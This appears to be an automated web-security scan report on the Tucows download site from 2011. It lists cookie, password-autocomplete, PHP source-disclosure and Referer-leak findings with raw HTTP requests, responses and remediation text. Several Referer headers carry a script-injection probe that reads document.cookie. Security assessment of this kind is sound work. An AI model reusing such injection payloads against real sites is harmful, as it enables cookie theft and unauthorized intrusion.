GET /images/newassets/privacy.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:13 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/safesearchtoggle.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:57 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/search.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:46 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/sitemap.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:11 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/terms.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:22 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/warningcow200.png HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 20:50:43 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32690
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:26:53 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 84555
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Free Software and Sh ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /preview/194850/x22 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:14 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 37121
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sitemap.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:05 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 284258
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /software.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:01 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 49878
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Download Windows Fre ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /terms.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:26 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 38411
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]...
4. Password field with autocomplete enabledpreviousnext There are 62 instances of this issue:
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
The form contains the following password field with autocomplete enabled:
pw
Request
GET /preview/194850/x22 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password fields with autocomplete enabled:
pw
pwc
Request
GET /preview/194850/x22 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The application appears to disclose some server-side source code written in PHP.
Issue background
Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.
Issue remediation
Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.
Request
GET /includes/js/ajaxlib.js HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 20:50:37 GMT Server: Apache/2.2.14 (Ubuntu) Last-Modified: Tue, 19 Jan 2010 16:49:48 GMT ETag: "777b1-adf-47d8741fd0300" Accept-Ranges: bytes Content-Length: 2783 Cache-Control: max-age=604800 Expires: Thu, 10 Feb 2011 20:50:37 GMT Content-Type: application/javascript
function callAJAX(url, respHdlr, bPageView, failHdlr, callHdlr, bAsync) {
var bAsync = (bAsync == null ? true : bAsync); var req;
try { req = new XMLHttpRequest(); /* e.g. Firefox ...[SNIP]... or request variable. For example, // assuming you used javascript to set a cookie called "php_array" // to the value of a javascript array then you can restore the cookie // from PHP like this: // <?php // session_start(); // $my_array = unserialize(urldecode(stripslashes($_COOKIE['php_array']))); // print_r ($my_array); // ?> // /* This automatically converts both keys and values to strings. // The return string is not URL escaped, so you must call the // Javascript "escape()" function before you pass this string to PHP. * ...[SNIP]...
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
Request
GET /software.html?t=689&pf=win HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:04 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 56008
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Download Windows Fre ...[SNIP]... </script> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script> ...[SNIP]... <li class="bt6"><a href="http://mobile.butterscotch.com/?src=tcv3mobile" target="_blank"></a></li> <li class="bt7"><a href="http://www.butterscotch.com//free-software.html?src=tcv3freeware" target="_blank"></a></li> <li class="bt8"><a href="http://www.butterscotch.com/?src=tcv3video" target="_blank"></a> ...[SNIP]... </a> <a href="http://www.butterscotch.com/free-software.html?src=software" target="_blank" class="linkOrange f15">Browse more <b> ...[SNIP]... </a> <a href="http://www.butterscotch.com/help/security?src=software" target="_blank" class="linkOrange f15">Browse more <b> ...[SNIP]... <div id="cartouche" class="cartouchecontainer"> <a href="http://www.butterscotch.com/"><div class="cartoucheheader"> ...[SNIP]... <div class="cartouche_content"> <a href="http://www.butterscotch.com/tutorial/How-To-Install-Blu-Ray-Software?src=splr"><strong> ...[SNIP]... <p> In order to get the full Blu-ray experience you'll need to install the appropriate software. We show you how to do that in this episode. <a href="http://www.butterscotch.com/tutorial/How-To-Install-Blu-Ray-Software?src=splr">view it</a> ...[SNIP]... </div> <a href="http://www.butterscotch.com/tutorial/How-To-Install-Blu-Ray-Software?src=splr"><img src="http://www-s.butterscotch.com/uplassets/bluray1.jpg" height=84 width=84 alt="How do I - Use Blu-ray" /></a> ...[SNIP]... <div class="cartouche_content"> <a href="http://www.butterscotch.com/tutorial/Get-Directions-And-Check-Traffic?src=splr"><strong> ...[SNIP]... <p> Not only does the Bing iPhone application allow you to view maps, you can also use it to check traffic in your area. <a href="http://www.butterscotch.com/tutorial/Get-Directions-And-Check-Traffic?src=splr">view it</a> ...[SNIP]... </div> <a href="http://www.butterscotch.com/tutorial/Get-Directions-And-Check-Traffic?src=splr"><img src="http://www-s.butterscotch.com/uplassets/bing1.jpg" height=84 width=84 alt="Top Secrets - Bing iPhone app" /></a> ...[SNIP]... <div class="cartouche_content"> <a href="http://www.butterscotch.com/tutorial/Adding-Blu-Ray-To-A-Notebook-Computer?src=splr"><strong> ...[SNIP]... <p> Now that we've shown you how to add 